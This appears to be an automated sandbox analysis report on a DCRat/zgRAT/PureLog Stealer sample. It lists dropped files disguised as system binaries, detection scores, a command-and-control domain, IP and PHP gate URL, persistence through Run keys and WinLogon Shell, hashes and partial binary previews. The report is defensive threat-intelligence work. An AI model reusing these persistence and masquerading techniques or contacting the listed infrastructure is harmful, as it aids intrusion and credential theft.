C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Windows\AppReadiness\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\DVfmUYdt.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Windows\AppReadiness\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\Desktop\oANPimHy.log | 100% | Avira | TR/PSW.Agent.qngqt
C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | 100% | Avira | HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat | 100% | Avira | BAT/Delbat.C
C:\Users\user\Desktop\umLWkwXM.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\dMjZyaMQ.log | 100% | Avira | HEUR/AGEN.1300079
C:\Users\user\Desktop\bakRRaCx.log | 100% | Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | 100% | Joe Sandbox ML
C:\Windows\AppReadiness\RuntimeBroker.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\DVfmUYdt.log | 100% | Joe Sandbox ML
C:\Windows\AppReadiness\RuntimeBroker.exe | 100% | Joe Sandbox ML
C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\oANPimHy.log | 100% | Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML
C:\Users\user\Desktop\LzHTfErB.log | 100% | Joe Sandbox ML
C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | 100% | Joe Sandbox ML
C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DVfmUYdt.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LzHTfErB.log | 8% | ReversingLabs
C:\Users\user\Desktop\UiajPhxi.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\bakRRaCx.log | 8% | ReversingLabs
C:\Users\user\Desktop\dMjZyaMQ.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\kDsGBTSe.log | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\ksQGNTNC.log | 17% | ReversingLabs
C:\Users\user\Desktop\oANPimHy.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\umLWkwXM.log | 17% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\vaQeWJTK.log | 17% | ReversingLabs
C:\Windows\AppReadiness\RuntimeBroker.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\DiagTrack\RuntimeBroker.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                              No Antivirus matches
                              No Antivirus matches
Source | Detection | Scanner | Label | Link
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
373292cm.nyashka.top | 80.211.144.156 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | true | | unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://ac.ecosia.org/autocomplete?q=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 
00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://duckduckgo.com/chrome_newtabjW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 
00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                    unknown
                                    https://duckduckgo.com/ac/?q=jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013C75000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013A8D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013EF5000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012DD1000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000136BE000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000138A6000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013757000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013D0D000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013B26000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001356F000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013E5C000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013388000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.000000001393E000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000134D7000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.00000000131A0000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012FB9000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012F20000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000013108000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 
00000017.00000002.2551603283.00000000132EF000.00000004.00000800.00020000.00000000.sdmp, jW5TA1J9Z1.exe, 00000017.00000002.2551603283.0000000012D39000.00000004.00000800.00020000.00000000.sdmp, A31r3hNHGH.23.drfalse
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico | jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | false
                                        unknown
                                        http://373292cm.nyashka.top | jW5TA1J9Z1.exe | true
                                          unknown
                                          https://ch.search.yahoo.com/favicon.ico https://ch.search.yahoo.com/search | jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | false
                                          • URL Reputation: safe
                                          unknown
                                          https://duckduckgo.com/favicon.ico https://duckduckgo.com/?q= | jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | false
                                            unknown
                                            http://373292cm.nyashka.top/ | jW5TA1J9Z1.exe | true
                                              unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | jW5TA1J9Z1.exe | false
                                              • URL Reputation: safe
                                              unknown
                                              https://www.ecosia.org/newtab/ | jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | false
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | jW5TA1J9Z1.exe | false
                                              • URL Reputation: safe
                                              unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.ico https://www.ecosia.org/search?q= | jW5TA1J9Z1.exe, A31r3hNHGH.23.dr | false
                                              • URL Reputation: safe
                                              unknown
                                              http://373292cm.nyPZ | jW5TA1J9Z1.exe | false
                                                unknown
                                                IP:80.211.144.156
                                                Domain:373292cm.nyashka.top
                                                Country:Italy
                                                ASN:31034
                                                ASN Name:ARUBA-ASNIT
                                                Malicious:true
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1496460
                                                Start date and time:2024-08-21 10:01:55 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 47s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:43
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:jW5TA1J9Z1.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:910284D590BDF27BBEEDBDE3F3A2A94D.exe
                                                Detection:MAL
                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@32/503@2/1
                                                EGA Information:
                                                • Successful, ratio: 7.1%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target MQYzEFytUKABjmoxvNTPTwUrcL.exe, PID 4904 because it is empty
                                                • Execution Graph export aborted for target MQYzEFytUKABjmoxvNTPTwUrcL.exe, PID 5368 because it is empty
                                                • Execution Graph export aborted for target MQYzEFytUKABjmoxvNTPTwUrcL.exe, PID 7916 because it is empty
                                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 3824 because it is empty
                                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 4580 because it is empty
                                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 7964 because it is empty
                                                • Execution Graph export aborted for target dwm.exe, PID 180 because it is empty
                                                • Execution Graph export aborted for target dwm.exe, PID 1860 because it is empty
                                                • Execution Graph export aborted for target dwm.exe, PID 2436 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 5664 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 7032 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 7600 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 7840 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                • Report size getting too big, too many NtReadFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: jW5TA1J9Z1.exe
                                                Time | Type | Description
                                                04:03:02 | API Interceptor | 434231x Sleep call for process: jW5TA1J9Z1.exe modified
                                                10:02:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                10:03:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:57:49 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:58:02 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1 "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                11:58:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                11:58:19 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:58:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:58:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1 "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                11:58:44 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                11:58:52 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:59:00 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:59:08 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1 "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                11:59:24 | Autostart | Run: WinLogon Shell "C:\Windows\AppReadiness\RuntimeBroker.exe"
                                                11:59:32 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:59:41 | Autostart | Run: WinLogon Shell "C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:59:49 | Autostart | Run: WinLogon Shell "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                80.211.144.156 | NFnZNaiEGC.exe | malicious | DCRat, PureLog Stealer, zgRAT | 097430cm.n9sh.top/ImagephppacketLongpolllinuxUniversalDle.php
                                                80.211.144.156 | PCf6uF6Pp0.exe | malicious | DCRat, PureLog Stealer, zgRAT | shizofrenia.top/externalPythonmultiProtect.php
                                                No context
                                                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                ARUBA-ASNIT | Atlas Copco- WEPCO.exe | malicious | FormBook | 62.149.128.40
                                                ARUBA-ASNIT | NFnZNaiEGC.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
                                                ARUBA-ASNIT | ExeFile (201).exe | malicious | Emotet | 80.211.32.88
                                                ARUBA-ASNIT | PCf6uF6Pp0.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
                                                ARUBA-ASNIT | file No83293 PO & Specification.gz.exe | malicious | FormBook | 62.149.128.40
                                                ARUBA-ASNIT | botx.arm6.elf | malicious | Mirai | 212.237.61.67
                                                ARUBA-ASNIT | 64MXEd79F1.exe | malicious | FormBook | 62.149.128.40
                                                ARUBA-ASNIT | Nuova immagine bitmap (2).js | malicious | Unknown | 80.88.84.21
                                                ARUBA-ASNIT | mtTw7o41OC.exe | malicious | FormBook, PureLog Stealer | 62.149.128.45
                                                ARUBA-ASNIT | https://www.unosicilia.it/verif/login | malicious | Unknown | 89.46.108.69
                                                No context
                                                Match | Associated Sample Name / URL | Detection | Threat Name
                                                C:\Users\user\Desktop\DVfmUYdt.log | K61NUunFJv.exe | malicious | DCRat
                                                C:\Users\user\Desktop\DVfmUYdt.log | NFnZNaiEGC.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                C:\Users\user\Desktop\DVfmUYdt.log | PCf6uF6Pp0.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                C:\Users\user\Desktop\DVfmUYdt.log | 4fmxsamrPG.exe | malicious | DCRat
                                                C:\Users\user\Desktop\DVfmUYdt.log | 4QXC0LSV8t.exe | malicious | DCRat
                                                C:\Users\user\Desktop\DVfmUYdt.log | webWin.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                C:\Users\user\Desktop\DVfmUYdt.log | W1nner client.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                C:\Users\user\Desktop\DVfmUYdt.log | htxERaJl1W.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                C:\Users\user\Desktop\DVfmUYdt.log | Injector.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                C:\Users\user\Desktop\DVfmUYdt.log | WWAHost.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (407), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):407
                                                                    Entropy (8bit):5.82168149031522
                                                                    Encrypted:false
                                                                    SSDEEP:6:KKuHTJVsV2TbONOmv35i9V4sWm12v5HWhjjVYjIY0JicoKZtrtKJjEFGai81n:KKuHH0uYfItWpv5HWh/Vz9Gaio
                                                                    MD5:BD4097EB8EAA695A449023A44E7644A6
                                                                    SHA1:C704874C9C38F5AAA3FFC4817E9D11C145173CBF
                                                                    SHA-256:D206E87680237D25BD8330A553D621BF8945DB022CEC4DB5EDA0657FC9B7331C
                                                                    SHA-512:34ADB62830FB8470D9FAFD5081B3D75BF1BBF14EFC6D024336E4E061574A22B984E9A9CC3100C876973705DF8238964C24075355ACD639E465D2E2C6DE2F5D00
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):1168
                                                                    Entropy (8bit):4.448520842480604
                                                                    Encrypted:false
                                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                    Malicious:false
                                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4608
                                                                    Entropy (8bit):3.898711169208433
                                                                    Encrypted:false
                                                                    SSDEEP:48:6Im1t9xZ8RxeOAkFJOcV4MKe28dJsVlvqBH/uulB+hnqXSfbNtm:e6xvxVx9psVlvkRTkZzNt
                                                                    MD5:A88AF3796A749AD28DB691EDE7B3212C
                                                                    SHA1:6FC2DC40F3F75840106020FFBFFEDEDF59FC1283
                                                                    SHA-256:F2694FB125365B59694C8023F06B0D36DAF24FBD50601F8A6827A8817AF84E65
                                                                    SHA-512:96D4E780C37E74DD8BFA8CCADC0C049D0699E9C96582F325F8BEAE6B9129C8B65A1BE0568F5E84B86B8F21BC3239ED93E8D62566F2BB2E5980F7EFF9DC779EA6
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
